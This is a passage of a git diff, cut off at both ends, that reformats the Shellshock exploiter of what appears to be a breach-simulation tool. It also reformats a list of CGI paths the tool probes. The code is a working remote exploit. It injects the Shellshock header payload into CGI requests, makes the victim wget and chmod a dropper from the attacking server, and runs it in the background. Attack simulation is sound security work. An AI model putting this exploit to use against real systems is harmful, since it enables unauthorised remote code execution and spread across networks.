infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.model import DROPPER_ARG from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -__author__ = 'danielg' +__author__ = "danielg" LOG = logging.getLogger(__name__) TIMEOUT = 2 -TEST_COMMAND = '/bin/uname -a' +TEST_COMMAND = "/bin/uname -a" DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder -LOCK_HELPER_FILE = '/tmp/monkey_shellshock' +LOCK_HELPER_FILE = "/tmp/monkey_shellshock" class ShellShockExploiter(HostExploiter): - _attacks = { - "Content-type": "() { :;}; echo; " - } + _attacks = {"Content-type": "() { :;}; echo; "} - _TARGET_OS_TYPE = ['linux'] 
- _EXPLOITED_SERVICE = 'Bash' + _TARGET_OS_TYPE = ["linux"] + _EXPLOITED_SERVICE = "Bash" def __init__(self, host): super(ShellShockExploiter, self).__init__(host) self.HTTP = [str(port) for port in self._config.HTTP_PORTS] - self.success_flag = ''.join( - choice(string.ascii_uppercase + string.digits - ) for _ in range(20)) + self.success_flag = "".join( + choice(string.ascii_uppercase + string.digits) for _ in range(20) + ) self.skip_exist = self._config.skip_exploit_if_file_exist def _exploit_host(self): # start by picking ports candidate_services = { - service: self.host.services[service] for service in self.host.services if - ('name' in self.host.services[service]) and (self.host.services[service]['name'] == 'http') + service: self.host.services[service] + for service in self.host.services + if ("name" in self.host.services[service]) + and (self.host.services[service]["name"] == "http") } - valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if - 'tcp-' + str(port) in candidate_services] + valid_ports = [ + (port, candidate_services["tcp-" + str(port)]["data"][1]) + for port in self.HTTP + if "tcp-" + str(port) in candidate_services + ] http_ports = [port[0] for port in valid_ports if not port[1]] https_ports = [port[0] for port in valid_ports if port[1]] LOG.info( - 'Scanning %s, ports [%s] for vulnerable CGI pages' % ( - self.host, ",".join([str(port[0]) for port in valid_ports])) + "Scanning %s, ports [%s] for vulnerable CGI pages" + % (self.host, ",".join([str(port[0]) for port in valid_ports])) ) attackable_urls = [] @@ -69,39 +76,45 @@ class ShellShockExploiter(HostExploiter): exploitable_urls = [url for url in exploitable_urls if url[0] is True] # we want to report all vulnerable URLs even if we didn't succeed - self.exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls] + self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls] # now try URLs until we install something on victim for _, url, header, exploit in exploitable_urls: LOG.info("Trying to attack host %s with %s URL" % (self.host, url)) # same attack script as sshexec # for any failure, quit and don't try other URLs - if not self.host.os.get('type'): + if not self.host.os.get("type"): try: - uname_os_attack = exploit + '/bin/uname -o' + uname_os_attack = exploit + "/bin/uname -o" uname_os = self.attack_page(url, header, uname_os_attack) - if 'linux' in uname_os: - self.host.os['type'] = 'linux' + if "linux" in uname_os: + self.host.os["type"] = "linux" else: LOG.info("SSH Skipping unknown os: %s", uname_os) return False except Exception as exc: LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc) return False - if not self.host.os.get('machine'): + if not self.host.os.get("machine"): try: - uname_machine_attack = exploit + '/bin/uname -m' + uname_machine_attack = exploit + "/bin/uname -m" uname_machine = self.attack_page(url, header, uname_machine_attack) - if '' != uname_machine: - self.host.os['machine'] = uname_machine.lower().strip() + if "" != uname_machine: + self.host.os["machine"] = uname_machine.lower().strip() except Exception as exc: - LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc) + LOG.debug( + "Error running uname machine command on victim %r: (%s)", self.host, exc + ) return False # copy the monkey dropper_target_path_linux = self._config.dropper_target_path_linux - if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, 
dropper_target_path_linux)): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) + if self.skip_exist and ( + self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux) + ): + LOG.info( + "Host %s was already infected under the current configuration, done" % self.host + ) return True # return already infected src_path = get_target_monkey(self.host) @@ -119,12 +132,12 @@ class ShellShockExploiter(HostExploiter): LOG.debug("Exploiter ShellShock failed, http transfer creation failed.") return False - download_command = '/usr/bin/wget %s -O %s;' % ( - http_path, dropper_target_path_linux) + download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux) download = exploit + download_command - self.attack_page(url, header, - download) # we ignore failures here since it might take more than TIMEOUT time + self.attack_page( + url, header, download + ) # we ignore failures here since it might take more than TIMEOUT time http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() @@ -132,30 +145,44 @@ class ShellShockExploiter(HostExploiter): self._remove_lock_file(exploit, url, header) if (http_thread.downloads != 1) or ( - 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): + "ELF" + not in self.check_remote_file_exists( + url, header, exploit, dropper_target_path_linux + ) + ): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) continue # turn the monkey into an executable - chmod = '/bin/chmod +x %s' % dropper_target_path_linux + chmod = "/bin/chmod +x %s" % dropper_target_path_linux run_path = exploit + chmod self.attack_page(url, header, run_path) T1222Telem(ScanStatus.USED, chmod, self.host).send() # run the monkey cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG) - cmdline += build_monkey_commandline(self.host, - get_monkey_depth() - 1, - HTTPTools.get_port_from_url(url), - dropper_target_path_linux) - cmdline += ' & ' + cmdline += build_monkey_commandline( + self.host, + get_monkey_depth() - 1, + HTTPTools.get_port_from_url(url), + dropper_target_path_linux, + ) + cmdline += " & " run_path = exploit + cmdline self.attack_page(url, header, run_path) - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, self.host, cmdline) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + self._config.dropper_target_path_linux, + self.host, + cmdline, + ) - if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)): + if not ( + self.check_remote_file_exists( + url, header, exploit, self._config.monkey_log_path_linux + ) + ): LOG.info("Log file does not exist, monkey might not have run") continue self.add_executed_cmd(cmdline) @@ -169,7 +196,7 @@ class ShellShockExploiter(HostExploiter): Checks if a remote file exists and returns the content if so file_path should be fully qualified """ - cmdline = '/usr/bin/head -c 4 %s' % file_path + cmdline = "/usr/bin/head -c 4 %s" % file_path run_path = exploit + cmdline resp = cls.attack_page(url, header, run_path) if resp: @@ -187,24 +214,24 @@ class ShellShockExploiter(HostExploiter): LOG.debug("Trying exploit for %s" % url) for header, exploit in list(attacks.items()): - attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND + attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND result = self.attack_page(url, header, attack) if self.success_flag in result: 
LOG.info("URL %s looks vulnerable" % url) return True, url, header, exploit else: LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header)) - return False, + return (False,) def _create_lock_file(self, exploit, url, header): if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE): return False - cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE + cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE self.attack_page(url, header, cmd) return True def _remove_lock_file(self, exploit, url, header): - cmd = exploit + 'rm %s' % LOCK_HELPER_FILE + cmd = exploit + "rm %s" % LOCK_HELPER_FILE self.attack_page(url, header, cmd) @staticmethod @@ -213,7 +240,9 @@ class ShellShockExploiter(HostExploiter): try: LOG.debug("Header is: %s" % header) LOG.debug("Attack is: %s" % attack) - r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) # noqa: DUO123 + r = requests.get( + url, headers={header: attack}, verify=False, timeout=TIMEOUT + ) # noqa: DUO123 result = r.content.decode() return result except requests.exceptions.RequestException as exc: @@ -226,9 +255,9 @@ class ShellShockExploiter(HostExploiter): Checks if which urls exist :return: Sequence of URLs to try and attack """ - attack_path = 'http://' + attack_path = "http://" if is_https: - attack_path = 'https://' + attack_path = "https://" attack_path = attack_path + str(host) + ":" + str(port) reqs = [] timeout = False @@ -240,7 +269,9 @@ class ShellShockExploiter(HostExploiter): timeout = True break if timeout: - LOG.debug("Some connections timed out while sending request to potentially vulnerable urls.") + LOG.debug( + "Some connections timed out while sending request to potentially vulnerable urls." + ) valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok] urls = [resp.url for resp in valid_resps] diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py index 46851dde1..3a128b23e 100644 --- a/monkey/infection_monkey/exploit/shellshock_resources.py +++ b/monkey/infection_monkey/exploit/shellshock_resources.py @@ -2,407 +2,407 @@ # copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list CGI_FILES = ( - r'/', - r'/admin.cgi', - r'/administrator.cgi', - r'/agora.cgi', - r'/aktivate/cgi-bin/catgy.cgi', - r'/analyse.cgi', - r'/apps/web/vs_diag.cgi', - r'/axis-cgi/buffer/command.cgi', - r'/b2-include/b2edit.showposts.php', - r'/bandwidth/index.cgi', - r'/bigconf.cgi', - r'/cartcart.cgi', - r'/cart.cgi', - r'/ccbill/whereami.cgi', - r'/cgi-bin/14all-1.1.cgi', - r'/cgi-bin/14all.cgi', - r'/cgi-bin/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp4.cgi', - r'/cgi-bin/addbanner.cgi', - r'/cgi-bin/add_ftp.cgi', - r'/cgi-bin/adduser.cgi', - r'/cgi-bin/admin/admin.cgi', - r'/cgi-bin/admin.cgi', - r'/cgi-bin/admin/getparam.cgi', - r'/cgi-bin/adminhot.cgi', - r'/cgi-bin/admin.pl', - r'/cgi-bin/admin/setup.cgi', - r'/cgi-bin/adminwww.cgi', - r'/cgi-bin/af.cgi', - r'/cgi-bin/aglimpse.cgi', - r'/cgi-bin/alienform.cgi', - r'/cgi-bin/AnyBoard.cgi', - r'/cgi-bin/architext_query.cgi', - r'/cgi-bin/astrocam.cgi', - r'/cgi-bin/AT-admin.cgi', - r'/cgi-bin/AT-generate.cgi', - r'/cgi-bin/auction/auction.cgi', - r'/cgi-bin/auktion.cgi', - r'/cgi-bin/ax-admin.cgi', - r'/cgi-bin/ax.cgi', - r'/cgi-bin/axs.cgi', - r'/cgi-bin/badmin.cgi', - r'/cgi-bin/banner.cgi', - r'/cgi-bin/bannereditor.cgi', - r'/cgi-bin/bb-ack.sh', - r'/cgi-bin/bb-histlog.sh', - 
r'/cgi-bin/bb-hist.sh', - r'/cgi-bin/bb-hostsvc.sh', - r'/cgi-bin/bb-replog.sh', - r'/cgi-bin/bb-rep.sh', - r'/cgi-bin/bbs_forum.cgi', - r'/cgi-bin/bigconf.cgi', - r'/cgi-bin/bizdb1-search.cgi', - r'/cgi-bin/blog/mt-check.cgi', - r'/cgi-bin/blog/mt-load.cgi', - r'/cgi-bin/bnbform.cgi', - r'/cgi-bin/book.cgi', - r'/cgi-bin/boozt/admin/index.cgi', - r'/cgi-bin/bsguest.cgi', - r'/cgi-bin/bslist.cgi', - r'/cgi-bin/build.cgi', - r'/cgi-bin/bulk/bulk.cgi', - r'/cgi-bin/cached_feed.cgi', - r'/cgi-bin/cachemgr.cgi', - r'/cgi-bin/calendar/index.cgi', - r'/cgi-bin/cartmanager.cgi', - r'/cgi-bin/cbmc/forums.cgi', - r'/cgi-bin/ccvsblame.cgi', - r'/cgi-bin/c_download.cgi', - r'/cgi-bin/cgforum.cgi', - r'/cgi-bin/.cgi', - r'/cgi-bin/cgi_process', - r'/cgi-bin/classified.cgi', - r'/cgi-bin/classifieds.cgi', - r'/cgi-bin/classifieds/classifieds.cgi', - r'/cgi-bin/classifieds/index.cgi', - r'/cgi-bin/.cobalt/alert/service.cgi', - r'/cgi-bin/.cobalt/message/message.cgi', - r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', - r'/cgi-bin/commandit.cgi', - r'/cgi-bin/commerce.cgi', - r'/cgi-bin/common/listrec.pl', - r'/cgi-bin/compatible.cgi', - r'/cgi-bin/Count.cgi', - r'/cgi-bin/csChatRBox.cgi', - r'/cgi-bin/csGuestBook.cgi', - r'/cgi-bin/csLiveSupport.cgi', - r'/cgi-bin/CSMailto.cgi', - r'/cgi-bin/CSMailto/CSMailto.cgi', - r'/cgi-bin/csNews.cgi', - r'/cgi-bin/csNewsPro.cgi', - r'/cgi-bin/csPassword.cgi', - r'/cgi-bin/csPassword/csPassword.cgi', - r'/cgi-bin/csSearch.cgi', - r'/cgi-bin/csv_db.cgi', - r'/cgi-bin/cvsblame.cgi', - r'/cgi-bin/cvslog.cgi', - r'/cgi-bin/cvsquery.cgi', - r'/cgi-bin/cvsqueryform.cgi', - r'/cgi-bin/day5datacopier.cgi', - r'/cgi-bin/day5datanotifier.cgi', - r'/cgi-bin/db_manager.cgi', - r'/cgi-bin/dbman/db.cgi', - r'/cgi-bin/dcforum.cgi', - r'/cgi-bin/dcshop.cgi', - r'/cgi-bin/dfire.cgi', - r'/cgi-bin/diagnose.cgi', - r'/cgi-bin/dig.cgi', - r'/cgi-bin/directorypro.cgi', - r'/cgi-bin/download.cgi', - r'/cgi-bin/e87_Ba79yo87.cgi', - r'/cgi-bin/emu/html/emumail.cgi', - r'/cgi-bin/emumail.cgi', - r'/cgi-bin/emumail/emumail.cgi', - r'/cgi-bin/enter.cgi', - r'/cgi-bin/environ.cgi', - r'/cgi-bin/ezadmin.cgi', - r'/cgi-bin/ezboard.cgi', - r'/cgi-bin/ezman.cgi', - r'/cgi-bin/ezshopper2/loadpage.cgi', - r'/cgi-bin/ezshopper3/loadpage.cgi', - r'/cgi-bin/ezshopper/loadpage.cgi', - r'/cgi-bin/ezshopper/search.cgi', - r'/cgi-bin/faqmanager.cgi', - r'/cgi-bin/FileSeek2.cgi', - r'/cgi-bin/FileSeek.cgi', - r'/cgi-bin/finger.cgi', - r'/cgi-bin/flexform.cgi', - r'/cgi-bin/fom.cgi', - r'/cgi-bin/fom/fom.cgi', - r'/cgi-bin/FormHandler.cgi', - r'/cgi-bin/FormMail.cgi', - r'/cgi-bin/gbadmin.cgi', - r'/cgi-bin/gbook/gbook.cgi', - r'/cgi-bin/generate.cgi', - r'/cgi-bin/getdoc.cgi', - r'/cgi-bin/gH.cgi', - r'/cgi-bin/gm-authors.cgi', - r'/cgi-bin/gm.cgi', - r'/cgi-bin/gm-cplog.cgi', - r'/cgi-bin/guestbook.cgi', - r'/cgi-bin/handler', - r'/cgi-bin/handler.cgi', - r'/cgi-bin/handler/netsonar', - r'/cgi-bin/hitview.cgi', - r'/cgi-bin/hsx.cgi', - r'/cgi-bin/html2chtml.cgi', - r'/cgi-bin/html2wml.cgi', - r'/cgi-bin/htsearch.cgi', - r'/cgi-bin/hw.sh', # testing - r'/cgi-bin/icat', - r'/cgi-bin/if/admin/nph-build.cgi', - r'/cgi-bin/ikonboard/help.cgi', - r'/cgi-bin/ImageFolio/admin/admin.cgi', - r'/cgi-bin/imageFolio.cgi', - r'/cgi-bin/index.cgi', - r'/cgi-bin/infosrch.cgi', - r'/cgi-bin/jammail.pl', - r'/cgi-bin/journal.cgi', - r'/cgi-bin/lastlines.cgi', - r'/cgi-bin/loadpage.cgi', - r'/cgi-bin/login.cgi', - r'/cgi-bin/logit.cgi', - r'/cgi-bin/log-reader.cgi', - r'/cgi-bin/lookwho.cgi', - r'/cgi-bin/lwgate.cgi', - 
r'/cgi-bin/MachineInfo', - r'/cgi-bin/MachineInfo', - r'/cgi-bin/magiccard.cgi', - r'/cgi-bin/mail/emumail.cgi', - r'/cgi-bin/maillist.cgi', - r'/cgi-bin/mailnews.cgi', - r'/cgi-bin/mail/nph-mr.cgi', - r'/cgi-bin/main.cgi', - r'/cgi-bin/main_menu.pl', - r'/cgi-bin/man.sh', - r'/cgi-bin/mini_logger.cgi', - r'/cgi-bin/mmstdod.cgi', - r'/cgi-bin/moin.cgi', - r'/cgi-bin/mojo/mojo.cgi', - r'/cgi-bin/mrtg.cgi', - r'/cgi-bin/mt.cgi', - r'/cgi-bin/mt/mt.cgi', - r'/cgi-bin/mt/mt-check.cgi', - r'/cgi-bin/mt/mt-load.cgi', - r'/cgi-bin/mt-static/mt-check.cgi', - r'/cgi-bin/mt-static/mt-load.cgi', - r'/cgi-bin/musicqueue.cgi', - r'/cgi-bin/myguestbook.cgi', - r'/cgi-bin/.namazu.cgi', - r'/cgi-bin/nbmember.cgi', - r'/cgi-bin/netauth.cgi', - r'/cgi-bin/netpad.cgi', - r'/cgi-bin/newsdesk.cgi', - r'/cgi-bin/nlog-smb.cgi', - r'/cgi-bin/nph-emumail.cgi', - r'/cgi-bin/nph-exploitscanget.cgi', - r'/cgi-bin/nph-publish.cgi', - r'/cgi-bin/nph-test.cgi', - r'/cgi-bin/pagelog.cgi', - r'/cgi-bin/pbcgi.cgi', - r'/cgi-bin/perlshop.cgi', - r'/cgi-bin/pfdispaly.cgi', - r'/cgi-bin/pfdisplay.cgi', - r'/cgi-bin/phf.cgi', - r'/cgi-bin/photo/manage.cgi', - r'/cgi-bin/photo/protected/manage.cgi', - r'/cgi-bin/php-cgi', - r'/cgi-bin/php.cgi', - r'/cgi-bin/php.fcgi', - r'/cgi-bin/ping.sh', - r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', - r'/cgi-bin/pollssi.cgi', - r'/cgi-bin/postcards.cgi', - r'/cgi-bin/powerup/r.cgi', - r'/cgi-bin/printenv', - r'/cgi-bin/probecontrol.cgi', - r'/cgi-bin/profile.cgi', - r'/cgi-bin/publisher/search.cgi', - r'/cgi-bin/quickstore.cgi', - r'/cgi-bin/quizme.cgi', - r'/cgi-bin/ratlog.cgi', - r'/cgi-bin/r.cgi', - r'/cgi-bin/register.cgi', - r'/cgi-bin/replicator/webpage.cgi/', - r'/cgi-bin/responder.cgi', - r'/cgi-bin/robadmin.cgi', - r'/cgi-bin/robpoll.cgi', - r'/cgi-bin/rtpd.cgi', - r'/cgi-bin/sbcgi/sitebuilder.cgi', - r'/cgi-bin/scoadminreg.cgi', - r'/cgi-bin-sdb/printenv', - r'/cgi-bin/sdbsearch.cgi', - r'/cgi-bin/search', - r'/cgi-bin/search.cgi', - r'/cgi-bin/search/search.cgi', - r'/cgi-bin/sendform.cgi', - r'/cgi-bin/shop.cgi', - r'/cgi-bin/shopper.cgi', - r'/cgi-bin/shopplus.cgi', - r'/cgi-bin/showcheckins.cgi', - r'/cgi-bin/simplestguest.cgi', - r'/cgi-bin/simplestmail.cgi', - r'/cgi-bin/smartsearch.cgi', - r'/cgi-bin/smartsearch/smartsearch.cgi', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/sojourn.cgi', - r'/cgi-bin/spin_client.cgi', - r'/cgi-bin/start.cgi', - r'/cgi-bin/status', - r'/cgi-bin/status_cgi', - r'/cgi-bin/store/agora.cgi', - r'/cgi-bin/store.cgi', - r'/cgi-bin/store/index.cgi', - r'/cgi-bin/survey.cgi', - r'/cgi-bin/sync.cgi', - r'/cgi-bin/talkback.cgi', - r'/cgi-bin/technote/main.cgi', - r'/cgi-bin/test2.pl', - r'/cgi-bin/test-cgi', - r'/cgi-bin/test.cgi', - r'/cgi-bin/testing_whatever', - r'/cgi-bin/test/test.cgi', - r'/cgi-bin/tidfinder.cgi', - r'/cgi-bin/tigvote.cgi', - r'/cgi-bin/title.cgi', - r'/cgi-bin/top.cgi', - r'/cgi-bin/traffic.cgi', - r'/cgi-bin/troops.cgi', - r'/cgi-bin/ttawebtop.cgi/', - r'/cgi-bin/ultraboard.cgi', - r'/cgi-bin/upload.cgi', - r'/cgi-bin/urlcount.cgi', - r'/cgi-bin/viewcvs.cgi', - r'/cgi-bin/view_help.cgi', - r'/cgi-bin/viralator.cgi', - r'/cgi-bin/virgil.cgi', - r'/cgi-bin/vote.cgi', - r'/cgi-bin/vpasswd.cgi', - r'/cgi-bin/way-board.cgi', - r'/cgi-bin/way-board/way-board.cgi', - r'/cgi-bin/webbbs.cgi', - r'/cgi-bin/webcart/webcart.cgi', - r'/cgi-bin/webdist.cgi', - r'/cgi-bin/webif.cgi', - r'/cgi-bin/webmail/html/emumail.cgi', - r'/cgi-bin/webmap.cgi', - 
r'/cgi-bin/webspirs.cgi', - r'/cgi-bin/Web_Store/web_store.cgi', - r'/cgi-bin/whois.cgi', - r'/cgi-bin/whois_raw.cgi', - r'/cgi-bin/whois/whois.cgi', - r'/cgi-bin/wrap', - r'/cgi-bin/wrap.cgi', - r'/cgi-bin/wwwboard.cgi.cgi', - r'/cgi-bin/YaBB/YaBB.cgi', - r'/cgi-bin/zml.cgi', - r'/cgi-mod/index.cgi', - r'/cgis/wwwboard/wwwboard.cgi', - r'/cgi-sys/addalink.cgi', - r'/cgi-sys/defaultwebpage.cgi', - r'/cgi-sys/domainredirect.cgi', - r'/cgi-sys/entropybanner.cgi', - r'/cgi-sys/entropysearch.cgi', - r'/cgi-sys/FormMail-clone.cgi', - r'/cgi-sys/helpdesk.cgi', - r'/cgi-sys/mchat.cgi', - r'/cgi-sys/randhtml.cgi', - r'/cgi-sys/realhelpdesk.cgi', - r'/cgi-sys/realsignup.cgi', - r'/cgi-sys/signup.cgi', - r'/connector.cgi', - r'/cp/rac/nsManager.cgi', - r'/create_release.sh', - r'/CSNews.cgi', - r'/csPassword.cgi', - r'/dcadmin.cgi', - r'/dcboard.cgi', - r'/dcforum.cgi', - r'/dcforum/dcforum.cgi', - r'/debuff.cgi', - r'/debug.cgi', - r'/details.cgi', - r'/edittag/edittag.cgi', - r'/emumail.cgi', - r'/enter_buff.cgi', - r'/enter_bug.cgi', - r'/ez2000/ezadmin.cgi', - r'/ez2000/ezboard.cgi', - r'/ez2000/ezman.cgi', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo2', - r'/fcgi-bin/echo2', - r'/Gozila.cgi', - r'/hitmatic/analyse.cgi', - r'/hp_docs/cgi-bin/index.cgi', - r'/html/cgi-bin/cgicso', - r'/html/cgi-bin/cgicso', - r'/index.cgi', - r'/info.cgi', - r'/infosrch.cgi', - r'/login.cgi', - r'/mailview.cgi', - r'/main.cgi', - r'/megabook/admin.cgi', - r'/ministats/admin.cgi', - r'/mods/apage/apage.cgi', - r'/_mt/mt.cgi', - r'/musicqueue.cgi', - r'/ncbook.cgi', - r'/newpro.cgi', - r'/newsletter.sh', - r'/oem_webstage/cgi-bin/oemapp_cgi', - r'/page.cgi', - r'/parse_xml.cgi', - r'/photodata/manage.cgi', - r'/photo/manage.cgi', - r'/print.cgi', - r'/process_buff.cgi', - r'/process_bug.cgi', - r'/pub/english.cgi', - r'/quikmail/nph-emumail.cgi', - r'/quikstore.cgi', - r'/reviews/newpro.cgi', - r'/ROADS/cgi-bin/search.pl', - r'/sample01.cgi', - r'/sample02.cgi', - r'/sample03.cgi', - r'/sample04.cgi', - r'/sampleposteddata.cgi', - r'/scancfg.cgi', - r'/scancfg.cgi', - r'/servers/link.cgi', - r'/setpasswd.cgi', - r'/SetSecurity.shm', - r'/shop/member_html.cgi', - r'/shop/normal_html.cgi', - r'/site_searcher.cgi', - r'/siteUserMod.cgi', - r'/submit.cgi', - r'/technote/print.cgi', - r'/template.cgi', - r'/test.cgi', - r'/ucsm/isSamInstalled.cgi', - r'/upload.cgi', - r'/userreg.cgi', - r'/users/scripts/submit.cgi', - r'/vood/cgi-bin/vood_view.cgi', - r'/Web_Store/web_store.cgi', - r'/webtools/bonsai/ccvsblame.cgi', - r'/webtools/bonsai/cvsblame.cgi', - r'/webtools/bonsai/cvslog.cgi', - r'/webtools/bonsai/cvsquery.cgi', - r'/webtools/bonsai/cvsqueryform.cgi', - r'/webtools/bonsai/showcheckins.cgi', - r'/wwwadmin.cgi', - r'/wwwboard.cgi', - r'/wwwboard/wwwboard.cgi' + r"/", + r"/admin.cgi", + r"/administrator.cgi", + r"/agora.cgi", + r"/aktivate/cgi-bin/catgy.cgi", + r"/analyse.cgi", + r"/apps/web/vs_diag.cgi", + r"/axis-cgi/buffer/command.cgi", + r"/b2-include/b2edit.showposts.php", + r"/bandwidth/index.cgi", + r"/bigconf.cgi", + r"/cartcart.cgi", + r"/cart.cgi", + r"/ccbill/whereami.cgi", + r"/cgi-bin/14all-1.1.cgi", + r"/cgi-bin/14all.cgi", + r"/cgi-bin/a1disp3.cgi", + r"/cgi-bin/a1stats/a1disp3.cgi", + r"/cgi-bin/a1stats/a1disp4.cgi", + r"/cgi-bin/addbanner.cgi", + r"/cgi-bin/add_ftp.cgi", + r"/cgi-bin/adduser.cgi", + r"/cgi-bin/admin/admin.cgi", + r"/cgi-bin/admin.cgi", + r"/cgi-bin/admin/getparam.cgi", + r"/cgi-bin/adminhot.cgi", + r"/cgi-bin/admin.pl", + r"/cgi-bin/admin/setup.cgi", + 
r"/cgi-bin/adminwww.cgi", + r"/cgi-bin/af.cgi", + r"/cgi-bin/aglimpse.cgi", + r"/cgi-bin/alienform.cgi", + r"/cgi-bin/AnyBoard.cgi", + r"/cgi-bin/architext_query.cgi", + r"/cgi-bin/astrocam.cgi", + r"/cgi-bin/AT-admin.cgi", + r"/cgi-bin/AT-generate.cgi", + r"/cgi-bin/auction/auction.cgi", + r"/cgi-bin/auktion.cgi", + r"/cgi-bin/ax-admin.cgi", + r"/cgi-bin/ax.cgi", + r"/cgi-bin/axs.cgi", + r"/cgi-bin/badmin.cgi", + r"/cgi-bin/banner.cgi", + r"/cgi-bin/bannereditor.cgi", + r"/cgi-bin/bb-ack.sh", + r"/cgi-bin/bb-histlog.sh", + r"/cgi-bin/bb-hist.sh", + r"/cgi-bin/bb-hostsvc.sh", + r"/cgi-bin/bb-replog.sh", + r"/cgi-bin/bb-rep.sh", + r"/cgi-bin/bbs_forum.cgi", + r"/cgi-bin/bigconf.cgi", + r"/cgi-bin/bizdb1-search.cgi", + r"/cgi-bin/blog/mt-check.cgi", + r"/cgi-bin/blog/mt-load.cgi", + r"/cgi-bin/bnbform.cgi", + r"/cgi-bin/book.cgi", + r"/cgi-bin/boozt/admin/index.cgi", + r"/cgi-bin/bsguest.cgi", + r"/cgi-bin/bslist.cgi", + r"/cgi-bin/build.cgi", + r"/cgi-bin/bulk/bulk.cgi", + r"/cgi-bin/cached_feed.cgi", + r"/cgi-bin/cachemgr.cgi", + r"/cgi-bin/calendar/index.cgi", + r"/cgi-bin/cartmanager.cgi", + r"/cgi-bin/cbmc/forums.cgi", + r"/cgi-bin/ccvsblame.cgi", + r"/cgi-bin/c_download.cgi", + r"/cgi-bin/cgforum.cgi", + r"/cgi-bin/.cgi", + r"/cgi-bin/cgi_process", + r"/cgi-bin/classified.cgi", + r"/cgi-bin/classifieds.cgi", + r"/cgi-bin/classifieds/classifieds.cgi", + r"/cgi-bin/classifieds/index.cgi", + r"/cgi-bin/.cobalt/alert/service.cgi", + r"/cgi-bin/.cobalt/message/message.cgi", + r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi", + r"/cgi-bin/commandit.cgi", + r"/cgi-bin/commerce.cgi", + r"/cgi-bin/common/listrec.pl", + r"/cgi-bin/compatible.cgi", + r"/cgi-bin/Count.cgi", + r"/cgi-bin/csChatRBox.cgi", + r"/cgi-bin/csGuestBook.cgi", + r"/cgi-bin/csLiveSupport.cgi", + r"/cgi-bin/CSMailto.cgi", + r"/cgi-bin/CSMailto/CSMailto.cgi", + r"/cgi-bin/csNews.cgi", + r"/cgi-bin/csNewsPro.cgi", + r"/cgi-bin/csPassword.cgi", + r"/cgi-bin/csPassword/csPassword.cgi", + r"/cgi-bin/csSearch.cgi", + r"/cgi-bin/csv_db.cgi", + r"/cgi-bin/cvsblame.cgi", + r"/cgi-bin/cvslog.cgi", + r"/cgi-bin/cvsquery.cgi", + r"/cgi-bin/cvsqueryform.cgi", + r"/cgi-bin/day5datacopier.cgi", + r"/cgi-bin/day5datanotifier.cgi", + r"/cgi-bin/db_manager.cgi", + r"/cgi-bin/dbman/db.cgi", + r"/cgi-bin/dcforum.cgi", + r"/cgi-bin/dcshop.cgi", + r"/cgi-bin/dfire.cgi", + r"/cgi-bin/diagnose.cgi", + r"/cgi-bin/dig.cgi", + r"/cgi-bin/directorypro.cgi", + r"/cgi-bin/download.cgi", + r"/cgi-bin/e87_Ba79yo87.cgi", + r"/cgi-bin/emu/html/emumail.cgi", + r"/cgi-bin/emumail.cgi", + r"/cgi-bin/emumail/emumail.cgi", + r"/cgi-bin/enter.cgi", + r"/cgi-bin/environ.cgi", + r"/cgi-bin/ezadmin.cgi", + r"/cgi-bin/ezboard.cgi", + r"/cgi-bin/ezman.cgi", + r"/cgi-bin/ezshopper2/loadpage.cgi", + r"/cgi-bin/ezshopper3/loadpage.cgi", + r"/cgi-bin/ezshopper/loadpage.cgi", + r"/cgi-bin/ezshopper/search.cgi", + r"/cgi-bin/faqmanager.cgi", + r"/cgi-bin/FileSeek2.cgi", + r"/cgi-bin/FileSeek.cgi", + r"/cgi-bin/finger.cgi", + r"/cgi-bin/flexform.cgi", + r"/cgi-bin/fom.cgi", + r"/cgi-bin/fom/fom.cgi", + r"/cgi-bin/FormHandler.cgi", + r"/cgi-bin/FormMail.cgi", + r"/cgi-bin/gbadmin.cgi", + r"/cgi-bin/gbook/gbook.cgi", + r"/cgi-bin/generate.cgi", + r"/cgi-bin/getdoc.cgi", + r"/cgi-bin/gH.cgi", + r"/cgi-bin/gm-authors.cgi", + r"/cgi-bin/gm.cgi", + r"/cgi-bin/gm-cplog.cgi", + r"/cgi-bin/guestbook.cgi", + 